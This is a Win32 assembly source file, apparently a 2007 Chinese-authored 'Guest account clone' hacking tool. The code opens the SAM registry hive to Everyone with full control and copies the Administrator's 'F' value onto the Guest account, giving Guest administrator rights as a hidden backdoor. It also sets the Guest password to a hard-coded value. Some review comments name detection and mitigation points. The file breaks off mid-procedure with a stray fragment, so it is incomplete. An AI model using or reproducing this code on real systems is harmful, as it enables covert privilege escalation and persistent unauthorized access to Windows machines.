;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Win32汇编版 Guest帐号克隆工具
;
; By taiwansee 2007-11-10
;
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff Clone.asm
; Link /subsystem:windows Clone.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
include netapi32.inc
includelib netapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 常量段与未初始化数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.const
DEBUG equ 0
HKLM equ HKEY_LOCAL_MACHINE
if DEBUG
NERR_SUCCESS equ 0
endif
.data?
stExplicitAccess EXPLICIT_ACCESS <>
stUserInfo USER_INFO_1003 <>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
if DEBUG
szCaption db 'Debug info......',0
szFailed db 'Open Subkey Failed!!!',0
szSuccess db 'Open Subkey Success!!!',0
szCloseSuccess db 'Close Subkey Success!!!',0
szCloseFailed db 'Close Subkey Failed!!!',0
szQueryValueSuccess db 'Query Value Success!!!',0
szQueryValueFailed db 'Query Value Failed!!!',0
szSetValueSuccess db 'Set Value Success!!!',0
szSetValueFailed db 'Set Value Failed!!!',0
szGetNamedSecurityInfoSuccess db 'Get Named Security Info Success!!!',0
szGetNamedSecurityInfoFailed db 'Get Named Security Info Failed!!!',0
szSetEntriesInAclSuccess db 'Set Entries In Acl Success!!!',0
szSetEntriesInAclFailed db 'Set Entries In Acl Failed!!!',0
szSetNamedSecurityInfoSuccess db 'Set Named Security Info Success!!!',0
szSetNamedSecurityInfoFailed db 'Set Named Security Info Failed!!!',0
szLocalFreeFailed1 db 'Local Free @lpSecurityDescriptor Failed!!!',0
szLocalFreeFailed2 db 'Local Free @lpOldDACL Failed!!!',0
szLocalFreeFailed3 db 'Local Free @lpNewDACL Failed!!!',0
szNetUserSetInfoSuccess db 'Net User Set Info Success!!!',0
szERROR_ACCESS_DENIED db 'szERROR_ACCESS_DENIED',0
szNERR_InvalidComputer db 'szNERR_InvalidComputer',0
szNERR_NotPrimary db 'szNERR_NotPrimary',0
szNERR_UserNotFound db 'szNERR_UserNotFound',0
szNERR_PasswordTooShort db 'szNERR_PasswordTooShort',0
szNetUserChangePasswordSuccess db 'szNetUserChangePasswordSuccess',0
szNetUserChangePasswordOtherError db 'szNetUserChangePasswordOtherError',0
szNERR_LastAdmin db 'szNERR_LastAdmin',0
szNERR_BadPassword db 'szNERR_BadPassword',0
szNERR_SpeGroupOp db 'szNERR_SpeGroupOp',0
szBuffer db 2048 dup(0)
szFormat db '%d',0
endif
szValueName db 'F',0
szObject db 'MACHINE\SAM\SAM',0
szAccessUser db 'Everyone',0
szSystemUser db 'System',0
szSubKey1 db 'SAM\SAM\Domains\Account\Users\000001F4',0
szSubKey2 db 'SAM\SAM\Domains\Account\Users\000001F5',0
szUserPassword dw 'E','v','i','l','o','c','t','a','l','2','0','0','7',00
szAccountName dw 'g','u','e','s','t',00
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;-----------------------------------------------------------------------
; _SetAccountPassword
; Resets the password of the local account named by szAccountName (the
; wide string "guest") to the wide string szUserPassword, using
; NetUserSetInfo information level 1003 (USER_INFO_1003 carries only the
; password field).
; ABI:   stdcall, no parameters; reads the globals stUserInfo,
;        szUserPassword and szAccountName.
; Out:   eax = NET_API_STATUS from NetUserSetInfo. In a non-DEBUG build
;        that status is never examined inside this proc, so a failure is
;        only detectable by the caller (the caller is not visible here).
; Clobb: eax, ecx, edx and flags may be changed by the called Win32
;        API(s) (stdcall callee convention); ebx/esi/edi are preserved.
; NOTE(review): changing another account's password requires an
;        administrative caller - the ERROR_ACCESS_DENIED branch below is
;        the path taken otherwise. A password reset of a built-in account
;        such as Guest is visible through account-management auditing
;        (password-reset audit events); alerting on such events for Guest
;        is the detection point for this step, and keeping Guest disabled
;        with no Everyone access to the SAM hive is the mitigation.
;        @lpError and @lpNULL are declared but never referenced.
;-----------------------------------------------------------------------
_SetAccountPassword proc
local @lpError:dword                    ; unused
local @lpNULL:dword                     ; unused
; stUserInfo.usri1003_password = L"Eviloctal2007" (szUserPassword, a
; NUL-terminated UTF-16 string built with dw in .data)
mov stUserInfo.usri1003_password,offset szUserPassword
; NetUserSetInfo(servername=NULL -> local machine, username=L"guest",
;                level=1003, buf=&stUserInfo, parm_err=NULL)
invoke NetUserSetInfo,NULL,\
offset szAccountName,\
1003,\
offset stUserInfo,\
NULL
; Debug-only diagnostics: map the NET_API_STATUS in eax to a message box.
; NERR_SUCCESS is only defined when DEBUG is non-zero (see .const), so
; this chain assembles only in a debug build. Each MessageBox overwrites
; eax, so the original status is lost after the first branch taken.
if DEBUG
.if eax==ERROR_ACCESS_DENIED
invoke MessageBox,NULL,offset szERROR_ACCESS_DENIED,offset szCaption,MB_OK
.elseif eax==NERR_InvalidComputer
invoke MessageBox,NULL,offset szNERR_InvalidComputer,offset szCaption,MB_OK
.elseif eax==NERR_NotPrimary
invoke MessageBox,NULL,offset szNERR_NotPrimary,offset szCaption,MB_OK
.elseif eax==NERR_UserNotFound
invoke MessageBox,NULL,offset szNERR_UserNotFound,offset szCaption,MB_OK
.elseif eax==NERR_PasswordTooShort
invoke MessageBox,NULL,offset szNERR_PasswordTooShort,offset szCaption,MB_OK
.elseif eax==NERR_SpeGroupOp
invoke MessageBox,NULL,offset szNERR_SpeGroupOp,offset szCaption,MB_OK
.elseif eax==NERR_BadPassword
invoke MessageBox,NULL,offset szNERR_BadPassword,offset szCaption,MB_OK
.elseif eax==NERR_LastAdmin
invoke MessageBox,NULL,offset szNERR_LastAdmin,offset szCaption,MB_OK
.elseif eax==NERR_SUCCESS
invoke MessageBox,NULL,offset szNetUserChangePasswordSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szNetUserChangePasswordOtherError,offset szCaption,MB_OK
.endif
endif
; MASM emits the frame teardown for the two locals before the ret.
ret
_SetAccountPassword endp
_Clone proc
local @hSubkey1:dword,\
@hSubkey2:dword,\
@szBuffer[4096]:byte,\
@szDataType:dword,\
@szDataBuffer[4096]:byte,\
@szDataBufferSize:dword,\
@lpOldDACL:dword,\
@lpNewDACL:dword,\
@lpSecurityDescriptor:dword
pushad
;首先获取SAM主键的DACL
invoke GetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
addr @lpOldDACL,\
NULL,\
addr @lpSecurityDescriptor
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szGetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szGetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;清空EXPLICIT_ACCESS结构
invoke RtlZeroMemory,offset stExplicitAccess,sizeof stExplicitAccess
;创建一个ACE,允许Everyone完全控制对象,并允许子对象继承此权限
mov esi,offset stExplicitAccess
assume esi:ptr EXPLICIT_ACCESS
mov [esi].grfAccessPermissions,KEY_ALL_ACCESS
mov [esi].grfAccessMode,SET_ACCESS
mov [esi].grfInheritance,SUB_CONTAINERS_AND_OBJECTS_INHERIT;允许子对象继承此权限
mov [esi].Trustee.pMultipleTrustee,NULL
mov [esi].Trustee.MultipleTrusteeOperation,NO_MULTIPLE_TRUSTEE
mov [esi].Trustee.TrusteeForm,TRUSTEE_IS_NAME
mov [esi].Trustee.TrusteeType,TRUSTEE_IS_GROUP
mov [esi].Trustee.ptstrName,offset szAccessUser
;将新的ACE加入DACL
invoke SetEntriesInAcl,1,\
offset stExplicitAccess,\
@lpOldDACL,\
addr @lpNewDACL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetEntriesInAclSuccess,offset szCaption,MB_OK
.else
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
invoke MessageBox,NULL,offset szSetEntriesInAclFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;更新SAM主键的DACL
invoke SetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
@lpNewDACL,\
NULL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szSetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
mov @szDataBufferSize,sizeof @szDataBuffer
;打开目标子键1
invoke RegOpenKeyEx,HKLM,offset szSubKey1,\
0,\
KEY_ALL_ACCESS,\
addr @hSubkey1
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;打开目标子键2
invoke RegOpenKeyEx,HKLM,offset szSubKey2,\
0,\
KEY_ALL_ACCESS,\
addr @hSubkey2
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;查询目标键值1
invoke RegQueryValueEx,@hSubkey1,\
offset szValueName,\
0,\
addr @szDataType,\
addr @szDataBuffer,\
addr @szDataBufferSize
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szQueryValueSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szQueryValueFailed,offset szCaption,MB_OK
jmp @F
.endif
invoke wsprintf,addr @szBuffer,offset szFormat,@szDataBufferSize
invoke MessageBox,NULL,addr @szBuffer,offset szCaption,MB_OK
endif
;设置目标键值2
invoke RegSetValueEx,@hSubkey2,\
offset szValueName,\
0,\
REG_BINARY,\
addr @szDataBuffer,\
@szDataBufferSize
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetValueSuccess,offset szCaption,MB_OK
.else
push eax
invoke MessageBox,NULL,offset szSetValueFailed,offset szCaption,MB_OK
pop eax
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
jmp @F
.endif
endif
invoke RegCloseKey,@hSubkey1
invoke RegCloseKey,@hSubkey2
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szCloseSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szCloseFailed,offset szCaption,MB_OK
.endif
endif
;恢复原来的DACL,只要修改下用户组即可
mov [esi].Trustee.ptstrName,offset szSystemUser
assume esi:nothing
;将新的ACE加入DACL
invoke SetEntriesInAcl,1,\
offset stExplicitAccess,\
NULL,\
addr @lpOldDACL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetEntriesInAclSuccess,offset szCaption,MB_OK
.else
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
invoke MessageBox,NULL,offset szSetEntriesInAclFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
- <